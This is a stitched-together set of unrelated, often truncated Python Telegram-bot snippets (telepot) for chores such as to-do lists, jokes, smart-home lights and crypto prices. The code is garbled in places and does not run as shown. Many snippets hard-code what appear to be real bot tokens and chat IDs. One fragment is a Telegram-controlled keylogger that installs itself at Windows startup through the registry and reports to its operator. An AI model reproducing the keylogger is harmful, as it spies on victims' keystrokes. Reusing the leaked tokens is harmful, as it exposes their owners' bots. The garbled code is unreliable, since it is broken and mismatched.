def main(args): ### Set debugging level ### if args.debug: logging.basicConfig(level=logging.DEBUG) else: logging.basicConfig(level=logging.WARNING) import configparser #python3 ### Reading out config file ### config = configparser.ConfigParser() if args.section: if not args.section in config.sections(): logging.warning("Section {} unexistent. Adding it.".format( args.section)) config.add_section(args.section) save_config(config, args.config) else: args.section = "DEFAULT" logging.debug("Starting up.") try: api_key = config[args.section][ "API-key"] # note that configs are case INsensitive logging.debug(" -- using API-key: {}".format(api_key)) except KeyError: api_key = input("No api-key set. Please create one and enter it now: ") config.set(args.section, "API-key", api_key) save_config(config, args.config) try: mods = config[args.section]["mods"].split(',') logging.debug(" -- using mods: {}".format(mods)) except KeyError: mods = input( "No modules set to be loaded. Please list them separated by commas, e.g.: mod1,mod2,mod3:\n" ).replace(" ", "").strip(",") config.set(args.section, "mods", mods) mods = mods.split(",") save_config(config, args.config) # this is a blacklist within a whitelist # if the id is in the list, it is allowed to use the mods # if a mod is listed in the whitelist, it is blacklisted # {id:[]} would therefore allow usage of all mods for id whitelist = "{}" try: whitelist = config[args.section]["whitelist"] whitelist = open(whitelist).read() logging.debug(" -- using whitelist: {}".format(whitelist)) except KeyError: config.set(args.section, "whitelist", whitelist) save_config(config, args.config) logging.critical( "No whitelist set. Allowing all messages for now. This message won't be shown again for section {}." .format(args.section)) overseer = 0 try: overseer = config[args.section]["overseer"] logging.debug(" -- using overseer: {}".format(overseer)) except KeyError: logging.critical("No overseer set. Starting the bot to set this.") b = telepot.Bot(api_key) try: b.getMe() except (telepot.exception.UnauthorizedError, telepot.exception.BadHTTPResponse): logging.critical( "API-key is wrong. Please save the correct one in your {} !". format(args.config)) if yn("Erase old one for the next time?"): config.remove_option(args.section, "api-key") save_config(config, args.config) return logging.critical( "To register your ID, simply -private- message the bot now. You have got 65535 seconds to do so..." ) msgs = b.getUpdates(timeout=65535) m = Msg(msgs[0]["message"]) while not yn("Is this your Telegram name? \"{} {}\"".format( m.get_from_first_name(), m.get_from_last_name())): logging.critical( "ACKing all messages, retrying. Send a new message please (Timeout again 65535 secs.)" ) m = Msg( b.getUpdates(offset=msgs[~0]["update_id"] + 1, timeout=65535)[0]["message"]) overseer = m.get_from_id() config.set(args.section, "overseer", str(overseer)) save_config(config, args.config) ### Start up ### bot = Telegrambot(api_key, mods, whitelist, overseer) while True: try: cmd = input("> ") if cmd == "exit": return elif cmd == "help": print("Commands available:") print("\texit\t\texits the python script") print("\thelp\t\tshows this help") except (EOFError, KeyboardInterrupt, SystemError): sys.exit("\nGoodbye.")
import time, os from datetime import datetime import telepot from telepot.loop import MessageLoop from bantuan import bantuan waktu = tahun = waktu.year bulan = waktu.month hari = jam = waktu.hour menit = waktu.minute detik = waktu.second bot = telepot.Bot('123123123121:AAAAVVVBBGV2vchhGGSgg_vsgdvgs') def handle(msg): content_type, chat_type, chat_id = telepot.glance(msg) print(content_type, chat_type, chat_id) chat_id = msg['chat']['id'] text = msg['text'] #sender = msg['from']['id'] sender = msg['from']['username'] f = open('access.log', 'a') f.write("{}-{}-{} {}:{}:{}".format(hari, bulan, tahun, jam, menit, detik) + " Chat-id - " + str(chat_id) + " Text - " + str(text) + " Sender - " + sender + "\n") f.close()
# coding: utf-8 import telepot from agenda import processarComandos bot = telepot.Bot("TOKEN!!") def listou(comando): ''' -> Mostra as tarefas da lista. Param comando = comandos no estilo ProcessarComandos. return: string, string. ''' if len(lista) == 0: return 'Nenhuma tarefa.', 'TODO: Mostrando 0 de 0.\n' tasks = processarComandos(comando, lista) texto = '' for i in tasks: texto += i[1:] + '\n' total = '--\nTODO: Mostrando ' + str(len(tasks)) + ' de ' + str(len(lista)) return texto, total def retira(comando): ''' -> Remove a tarefa da lista. Param comando = Indice. return: String, dependendo do resultado. ''' try:
import sys import os import time import telepot from telepot.loop import MessageLoop from telepot.namedtuple import InlineQueryResultArticle, InputTextMessageContent import datetime import pymongo from pymongo import MongoClient from googletrans import Translator translator = Translator() APITOKEN = os.environ["TELEGRAM_API"] bot = telepot.Bot(APITOKEN) answerer = telepot.helper.Answerer(bot) connection_params = { 'user': os.environ["MONGO_USER"], 'password': os.environ["MONGO_PASS"], 'host': os.environ["MONGO_HOST"], 'port': int(os.environ['MONGO_PORT']), 'namespace': os.environ["DB_NAME"], } connection = MongoClient('mongodb://{user}:{password}@{host}:' '{port}/{namespace}'.format(**connection_params)) db = connection.amharic
import random import time # Limit of jokes LIMIT = 100 counter = 0 sub = 'Jokes' jokesTitles = [] jokesTexts = [] reddit = praw.Reddit(client_id=config.client_id, client_secret=config.client_secret, username=config.username, password=config.password, user_agent=config.user_agent) telebot = telepot.Bot(config.token) def initialize_jokes(): for i in range(0, LIMIT): jokesTitles.append('Nothing here... Only pure emptiness') jokesTexts.append('Only virtual particles are popping up') def handle(msg): global counter user_id = msg['chat']['id'] command = msg['text'].encode('utf-8').lower() if command == '/joke' or command == '/joke@rjokes_bot': joke = random.randint(1, LIMIT - 1)
if(time.strftime("%a") == 'Wed'): giorno = 'Giovedi\'' if(time.strftime("%a") == 'Fri'): giorno = 'Venerdi\'' if(time.strftime("%a") == 'Sat'): giorno = 'Sabato\'' if(time.strftime("%a") == 'Sun'): giorno = 'Domenica\'' bot.sendMessage(chat_id, 'Oggi e\' '+giorno+' '+'%s/%s/%s'% (, i.month, i.year)) else: bot.sendMessage(chat_id, 'Non capisco il comando.') else: bot.sendMessage(chat_id, 'Non sei autorizzate a darmi ordini! Il tuo chat ID non e\' nella lista.') bot.sendMessage(chat_id, sender) print chat_id bot = telepot.Bot('459932785:AAGjA3UjxB3TIdkhDPgT--sj11vTQa6EzME') bot.message_loop(handle) print 'Sono in ascolto...' while 1: time.sleep(10)
# Answer generator: answerGenerator = AnswerGenerator(knowledgeBase, questionPatterns) # Dictionary of user status (manage multiple users): user_status = {} # BabelNet domains: babelnet_domains = [] babelnet_domain_list_file = open( "../babelnet/BabelDomains_full/domain_list.txt") for line in babelnet_domain_list_file: babelnet_domains.append(line.rstrip()) # Setting up Telegram bot: bot = telepot.Bot(CHATBOT_TOKEN) #print(bot.getMe()) response = bot.getUpdates() #pprint(response) # Handle message: def handle(msg): global graph content_type, chat_type, chat_id = telepot.glance(msg) #print(content_type, chat_type, chat_id) if content_type == "text":
# Read the config file to get server url try: file = open("config.json", "r") json_str = file.close() except: raise KeyError("Error opening config file. Please check.") config_json = json.loads(json_str) url = config_json["catalog"]["url"] # Read the telegram settings from the catalogue try: url=url + "/telegram" respond = requests.get(url) except: raise KeyError("Unable to connect to catalogue") respond=respond.json() # Start the telegram bot bot=telepot.Bot(respond["token"]) try: MessageLoop(bot, handle).run_as_thread() except: print "Error connecting to telegram bot. Please check your connection or check if the bot token is available" print 'Bot started' while 1: time.sleep(10)
#import sys import telepot bot = telepot.Bot("906214196:AAFX6EiVdpWMoOx02nQCfaGFNzGOYyVXnms") bot.sendPhoto("-203550867", photo=open("img/photo.jpg", "rb"))
prossimo_giocatore=(prossimo_giocatore+1)%len(idlist) rinforzo() elif txt.startswith('Fine') and idlist[order.index(prossimo_giocatore)]==chat_id: prossimo_giocatore=(prossimo_giocatore+1)%len(idlist) tris() def on_callback_query(msg): query_id, from_id, query_data = telepot.glance(msg, flavor='callback_query') print('Callback Query:', query_id, from_id, query_data) global wait if query_data == '/inizio' and wait: wait = False global idlist global order ordine_turni() dividi_territori() global truppe_disponibili for i in range(len(idlist)): bot.sendMessage(idlist[i], 'Lancio dei dadi per decidere chi inizia...\nYou\'re the player n.{}'.format(order[i]+1)) bot.sendMessage(idlist[i], 'You have the following territories:'+territori_posseduti(i)+'\nAnd this goal: '+obiettivi(idlist[i])) bot.sendMessage(idlist[i], 'Hai a disposizione {} truppe, disponile nei tuoi territori scrivendo "Posiziona x1 x2 x3 ..." con x1, x2, x3, ... il numero di truppe da mettere in ogni territorio'.format(50-5*len(idlist))) colora() bot=telepot.Bot('*INSERT YOUR TOKEN HERE*') bot.message_loop({'chat': on_chat_message,'callback_query': on_callback_query}) print ('Listening ...') while 1: time.sleep(10)
import telepot # BIBLIOTECA RESPONSAVEL DOS COMANDOS EXISTENTES bot = telepot.Bot( '903074246:AAGSRnjBo_39KVCj-OuxHsWLCGkj3EteSI0') #API DO BOT NO TELEGRAM id_chat = 915426226 #id chat do ADM do bot def recebendo(msg): #FUNÇÃO QUE RECEBE A MENSAGEM QUE O BOT RECEBE msg_texto = msg['text'] # ARMAZENA A MENSAGEM QUE ENVIARAM AO BOT msg_id = msg['chat'][ 'id'] # ARMAZENA O ID DO CHAT DA PESSOA QUE MANDOU MENSAGEM AO BOT if msg_texto == '1': # Caso seja 1 a mensagem enviada ele abre a fechadura bot.sendMessage(id_chat, "FECHADURA ABERTA!") if msg_texto == '2': # Caso 2, envia os dados do banco de dados sobre todas as aberturas da fechadura bot.sendMessage(id_chat, "HISTÓRICO!") if msg_texto == '3': # Caso 3, captura novamente uma foto bot.sendMessage(id_chat, "CAPTURA NOVAMENTE FOTO") def envia_msg(admin): # função para enviar mensagem ao adm do bot # bot.sendPhoto(admin, "FOTO A SER ENVIADA PARA A PESSOA") <- aqui será enviado a foto para o bot bot.sendMessage(admin, "INSTRUÇÕES:\n\n" "1- \tABRIR FECHADURA\n\n" "2- \tHISTÓRICO DA FECHADURA\n\n"
data = json.load(f) # Inicializa uma lista receita = list() # Esse laço de repetição preenche a lista com Objetos do tipo receita e dados brutos do banco de dados contador = 0 while contador < 8183: data2 = data[contador]['nome'] data3 = data[contador]['secao'] receita.append(Receita(data2, data3)) contador = contador + 1 pattern = re.compile("x") print("dog")) bot = telepot.Bot("COLOQUEAQUISEUCÓDIGODOBOTFATHER") falouOI = ("Nao") roteiro = 0 #Seguindo um roteiro para consultar uma receita numeroAleatorio = 0 #Numero usado para sortear uma receita receitasDe = list() #Guarda lista de receitas consultadas por titulo receitasCom = list() #Guarda lista de receitas consultadas por ingredientes pessoa = Pessoa() def verificaRoteiro(msg, data): global roteiro def pessoaExiste(id): for item in pessoas:
def handle(msg): command = msg['text'] print('Got command: %s' % command) if command == 'ON': on() elif command == 'OFF': off() elif command == 'TALK': talk() bot = telepot.Bot('XXXXXXXXXXXXX') bot.message_loop(handle) print('I am listening...') while 1: try: time.sleep(10) except KeyboardInterrupt: print('\n Program interrupted') exit() except: print('Other error or exception occured!')
import os import pygame import telepot from telepot.loop import MessageLoop import config #bot key bot = telepot.Bot('ENTER YOUR KEY HERE') #que q = [] #if queue is empty or not empty = False #directory name dir_name = "MUSIC LOCATION" #variable to hold listing a = os.listdir(dir_name) #store all the msuic files listall = """Music archive.""" #list all the music in directory for i in range(0, len(a)): print('{}.{}'.format(i, a[i])) listall = listall + '\n{}.{}'.format(i, a[i]) #Send message to user with their user ID def sms(ID, str): bot.sendMessage(ID, str) #reply message to user with their user ID and to the message ID def reply(ID, msgID, str):
import time, datetime import telepot from telepot.loop import MessageLoop now = token = 'enter your token here' def action(msg): chat_id = msg['chat']['id'] command = msg['text'] print chat_id if command == '/hi': telegram_bot.sendMessage(chat_id, str("Hi from ProDot Industries")) telegram_bot = telepot.Bot(token) print(telegram_bot.getMe()) MessageLoop(telegram_bot, action).run_as_thread() while 1: time.sleep(10) print 'Up and Running....'
if text.startswith('거래') and len(args) > 1: print('try to 거래', args[1]) replyAptData(args[1], chat_id, args[2]) elif text.startswith('지역') and len(args) > 1: print('try to 지역', args[1]) replyAptData('201705', chat_id, args[1]) elif text.startswith('저장') and len(args) > 1: print('try to 저장', args[1]) save(chat_id, args[1]) elif text.startswith('확인'): print('try to 확인') check(chat_id) else: noti.sendMessage( chat_id, '모르는 명령어입니다.\n지역 [지역번호], 저장 [지역번호], 확인 중 하나의 명령을 입력하세요.') today = current_month = today.strftime('%Y%m') print('[', today, ']received token :', noti.TOKEN) bot = telepot.Bot(noti.TOKEN) pprint(bot.getMe()) bot.message_loop(handle) print('Listening...') while 1: time.sleep(10)
from requests import get def handle(msg): chat_id = msg['chat']['id'] command = msg['text'] print('Got command: %s' % command) if command == '/rates': url = '' response = get(url).json() bot.sendMessage( chat_id, "BTC: $" + response['data'][0]['amount'] + "\n" + "BCH: $" + response['data'][1]['amount'] + "\n" + "ETH: $" + response['data'][2]['amount'] + "\n" + "LTC: $" + response['data'][3]['amount']) else: bot.sendMessage( chat_id, "Oops! I don't seem to understand this command. Text '/rates' to see the current exchange rates." ) bot = telepot.Bot('450826388:AAExq8IUAauw2BuZTyIRjy3dP2ibB5hgXZc') MessageLoop(bot, handle).run_as_thread() print('I am listening ...') while 1: time.sleep(10)
po = retrievePosition(str(packet)) except Exception as detail: bot.sendMessage("Error in accessing the database") return if po is not None: pos = json.loads(po) bot.sendLocation(id, pos['lat'], pos['long']) return else: bot.sendMessage(id, 'Your packet is not in the system') elif msg['text'] == "/gettemperature": return elif msg['text'] == "/gethumidity": return elif msg['text'] == "/getall": return else: return if __name__ == '__main__': bot = telepot.Bot('378511160:AAF8PCogZt5ZtPUp_gaJU2BPMoWnF6-8zuQ') bot.message_loop({'chat': on_message}, relax=60, run_forever=True)
GPIO.setup(17,GPIO.OUT) #Wheel 2 GPIO.setup(18,GPIO.OUT) # Wheel 2 #GPIO.setup(24,GPIO.IN)#echo1 #GPIO.setup(23,GPIO.OUT)#Trig1 #GPIO.setup(16,GPIO.OUT)#Servo Motor GPIO.setup(20,GPIO.OUT)#Trigger2 GPIO.setup(21,GPIO.IN)#Echo2 #GPIO.setup(19,GPIO.OUT) #Lid Motor #GPIO.setup(26,GPIO.OUT) #Lid Motor Setup() bot= telepot.Bot('812318556:AAEcVpsMRR9HE9Ee8TW3YipykpgnKU1GGL4') def Dist(): GPIO.output(20, False) time.sleep(2) print( "Calculating distance") GPIO.output(20, True) time.sleep(0.00001) GPIO.output(20, False) while GPIO.input(21)==0: pulse_start_time = time.time() while GPIO.input(21)==1:
import os import sys import csv import time import zipfile import psycopg2 import re import shutil from itertools import groupby import telepot import emoji import subprocess import pysftp bot = telepot.Bot('194101126:AAFDRz3cHj-Y7YOQsad_ZFRFJKn2qt2oBmQ') OK = emoji.emojize(':heavy_check_mark:') start_time = time.time() #####SET DIR dirout_db = '/home/postgres/temp/baseline/' dirmml = '/ftproot/Scripts/Custom/Consistency_check/' #####Connect to the database92 db_conn = psycopg2.connect( "dbname='postgres' user='******' host='' password='******'" ) cursor = db_conn.cursor() print('Connected to the database') ###BASELINE ENODEB NOK query = "copy(select * from umts_baseline.baseline_audit_lte('enodeb_baseline') where status = 'NOK') to '" + dirout_db + "baseline_enodeb.txt';"
pass if clock == '18:00:00': pass if today.month == 12 and == 25 and clock == '00:00:00': bot.sendMessage(CHAT, 'Ho-ho-ho!\nFeliz natal!') #===================================================================== #variaveis de inicialização botname = 'R 4 M B O T' print('Inicializando', botname) print('carregando keys...') bot = telepot.Bot( '123456789abcdefghijk') #ALTERAR PELA SUA CHAVE DE API DO BOT #news api news_api = 'XXXXXXXXXXXX' #ALTERAR PELO SUA API KEY news_list = ['1337'] #Google Translator translate = Translator() #tweepy # consumer_key = 'xxxxxxxx-12345' consumer_secret = 'XXXXXXXXX-12345678' access_token = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX' access_token_secret = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
import time import Queue as queue import telepot def handle(msg): print msg bot = telepot.Bot('abc') qu = queue.Queue() bot.message_loop(handle, source=qu, maxhold=8) def u(update_id): return {'update_id': update_id, 'message': update_id} sequence = [ u(1), # initialize u(2), # no buffering u(4), # 1-gap u(3), # clear 2 u(7), # 2-gap u(5), # return, leave 1-gap u(6), # clear 2 u(10), # 2-gap u(9), # 1-gap u(8), # clear 3 u(15),
try: # Solo si tiene permisos de administrador registry = OpenKey(HKEY_LOCAL_MACHINE, keyVal, 0, KEY_ALL_ACCESS) # machine SetValueEx(registry,name, 0, REG_SZ, path) verificar() # Crea Carpeta except: # Si no tien permisos de administrador if (verificar()): registry = OpenKey(HKEY_CURRENT_USER, keyVal, 0, KEY_ALL_ACCESS) # local SetValueEx(registry,name, 0, REG_SZ, path) cd.log('s', 'Configuración Terminada') cd.log('i', 'Iniciando') addStartup() bot = telepot.Bot(token) bot.message_loop(handle) if len(known_ids) > 0: helloWorld = platform.uname()[1] + ": ==>> Está en linea..." for known_id in known_ids: send_safe_message(bot, known_id, helloWorld) print(helloWorld) cd.log('s', 'Iniciando Hilo de Keylogger') cd.log('i', 'Keylogger iniciado') p1 = threading.Thread(target=Klogger) # Keylogger p1.start() # Inicia hilo keylogger cd.log('s', 'Todo se ejecutó con exito\n') cd.log('i', 'Esperando comandos ==>> ' + platform.uname()[1] + '...\n\n') pythoncom.PumpMessages() # Escucha los comandos p1.join()
add_watermark(filenameshort,str(npage),str(totpage),filenameencoded,filenameencodedwm) f = open( filenameencodedwm, 'rb') FILE2QR.sendPhoto(chat_id,f) encoded+=1 write_stat() if content_type == 'text': name = msg["from"]["first_name"] txt = msg['text'] if txt.startswith('/stats'): read_stat() FILE2QR.sendMessage(chat_id, "Stats:\nEncoded: "+str(encoded)+"\nDecoded: "+str(decoded)) elif txt.startswith('/info'): print ("Info") message = 'Hello %s!\nI am a bot to convert a binary file into QR code and viceversa.\nJust send me a binary file and I will convert it into QR images.\nSend me a QR code image and I will decode it into the original binary file.\nCurrent maximum file size is 2184 Bytes.\nBigger size in next release.\nAny suggestions are welcome. Contact the developer: [email protected]' message = message + '\nVersion %s ' message = message % (name, __version__) FILE2QR.sendMessage(chat_id, message) if __name__ == '__main__': read_stat() TOKEN = os.environ.get('BOT_TOKEN') FILE2QR = telepot.Bot(TOKEN) FILE2QR.message_loop(on_chat_message) while True: time.sleep(10)
bot.answerInlineQuery(query_id, articles) # need `/setinlinefeedback` def on_chosen_inline_result(msg): result_id, from_id, query_string = telepot.glance( msg, flavor='chosen_inline_result') print('Chosen Inline Result:', result_id, from_id, query_string) TOKEN = sys.argv[1] PORT = int(sys.argv[2]) URL = sys.argv[3] app = Flask(__name__) bot = telepot.Bot(TOKEN) update_queue = Queue() # channel between `app` and `bot` bot.message_loop( { 'chat': on_chat_message, 'callback_query': on_callback_query, 'inline_query': on_inline_query, 'chosen_inline_result': on_chosen_inline_result }, source=update_queue) # take updates from queue @app.route('/abc', methods=['GET', 'POST']) def pass_update(): update_queue.put( # pass update to bot
return False def debtCheck(): for i in range(len(debts)): if time.time( ) > debts[i]["time"] + debts[i]["+time"] and debts[i]["confirm"]: coins = debts[i]["coins"] coins += coins * (debts[i]["%"] / 100) users[searchID(users, debts[i]["to"])]['money'] -= coins users[searchID(users, debts[i]["from"])]['money'] += coins users[searchID(users, debts[i]["to"])]['money'] = round( users[searchID(users, debts[i]["to"])]['money'], 2) users[searchID(users, debts[i]["from"])]['money'] = round( users[searchID(users, debts[i]["from"])]['money'], 2) debts.pop(i) f = open("json/debts.json", "w") f.write(json.dumps(debts)) f.close() break token = '755622415:AAHQZlEYSm3tVRWkVNKmXv8tmEbx5TiY1ro' tb = telepot.Bot(token) MessageLoop(tb, handle).run_as_thread() while 1: time.sleep(0.1) debtCheck()
import DB import telepot import keyboard as kb from telepot.namedtuple import InlineKeyboardMarkup api = "898207689:AAHNWFB3jlPdqG6sU-x8M4OgRWkE_GpTxGk" admin = 953781362 bot = telepot.Bot(api) def send_new_user(user): afdelingen = DB.get_afdelingen() but = [] for afdeling in afdelingen: afdel = {} afdel[afdeling['naam']] = str( user['id']) + '_add_afdeling_' + afdeling['naam'] but.append(afdel) end = { 'Weigeren': str(user['id']) + '_add_afdeling_weigeren', 'Del msg': 'Del_msg' } but.append(end) end = {'Laat gebruiker het weten': 'startgebruiker_%s' % (str(user['id']))} but.append(end) bot.sendMessage( chat_id=admin, text=user['naam'] + '_' + str(user['id']) + ' ' + 'wilt graag toegang.\nTot welke afdelingen wilt u hem toegang verlenen?', reply_markup=InlineKeyboardMarkup( inline_keyboard=kb.Set_InlineKeyboard(but)))
elif command == 'alloff': off((redLight, greenLight, yellowLight, blueLight)) bot.sendMessage(chat_id, 'semua lampu sudah dimatikan') elif command =='allon': on((redLight, greenLight, yellowLight, blueLight)) bot.sendMessage(chat_id, 'semua lampu sudah dinyalakan') elif command =='/start': bot.sendMessage(chat_id, 'Siap menerima pesan Anda...') #elif command =='/help': # bot.sendMessage(chat_id, '*Selamat datang di Smarthome Telegram \nKodingkita* \nDaftar perintah:\n*redon* untuk menyalakan lampu merah \n*greenon* untuk menyalakan lampu hijau\n*yellowon* untuk menyalakan lampu kuning\n*blueon* untuk menyalakan lampu biru\n*redoff* untuk mematikan lampu merah\n*greenoff* untuk mematikan lampu hijau\n*yellowoff* untuk mematikan lampu kuning\n*blueoff* untuk mematikan lampu biru\n*greenoff* untuk mematikan lampu merah\n*allon* untuk menyalakan semua lampu\n*alloff* untuk mematikan semua lampu', parse_mode= 'Markdown') bot = telepot.Bot('YOUR KEY') # Ganti 'Bot Token' dengan kode token anda, misal bot = telepot.Bot('eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9') bot.message_loop(handle) print('===============================================') print('Selamat datang di Smarthome Telegram Kodingkita') print('===============================================') print(' ') print(' + kirim pesan redon untuk menyalakan lampu merah') print(' + kirim pesan greenon untuk menyalakan lampu hijau') print(' + kirim pesan yellowon untuk menyalakan lampu') print(' + kirim pesan blueon untuk menyalakan lampu') print(' + kirim pesan redoff untuk menyalakan lampu') print(' + kirim pesan greenoff untuk menyalakan lampu') print(' + kirim pesan yellowoff untuk menyalakan lampu') print(' + kirim pesan blueoff untuk menyalakan lampu') print(' + kirim pesan allon untuk menyalakan semua lampu') print(' + kirim pesan alloff untuk mematikan semua lampu')
#coder :- Salman Faris import sys import time import datetime import telepot import socket import fcntl import struct bot = telepot.Bot('361308020:AAEbxl4L0AWZs4sYhvmzOP9Lw9SuCUvz960') chat_id = 340690686 time.sleep(2) def get_ip_address(ifname): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) return socket.inet_ntoa( fcntl.ioctl( s.fileno(), 0x8915, # SIOCGIFADDR struct.pack('256s', ifname[:15]))[20:24]) #def handle(msg): # chat_id = msg['chat']['id'] # command = msg['text'] # # print 'Got command: %s' % command # # if command == 'ping':
elif command == 'Limit7': bot.sendMessage(chat_id, text="Limited 7Mbps") os.system("python /home/pi/ &") raise SystemExit elif command == 'Nolimit3': bot.sendMessage(chat_id, text="Limit3 Off") os.system("python /home/pi/ &") raise SystemExit elif command == 'Nolimit7': bot.sendMessage(chat_id, text="Limit7 Off") os.system("python /home/pi/ &") raise SystemExit elif command == 'Status': vlanlimit7ip = os.system("ping -c 1") vlanlimit3ip = os.system("ping -c 1") if (vlanlimit7ip == 0 and vlanlimit3ip == 0): bot.sendMessage(chat_id, text="Mblandang!") elif (vlanlimit7ip >= 0 and vlanlimit3ip == 0): bot.sendMessage(chat_id, text="Limiter 7 ON!") elif (vlanlimit7ip == 0 and vlanlimit3ip >= 0): bot.sendMessage(chat_id, text="Limiter 3 ON!") else: pass bot = telepot.Bot('000000000:AAA_AA-AAAAAAAAAAAAAAAAAAAAAAAAAAAA') bot.message_loop(handle) print 'I am listening...' while 1: time.sleep(10)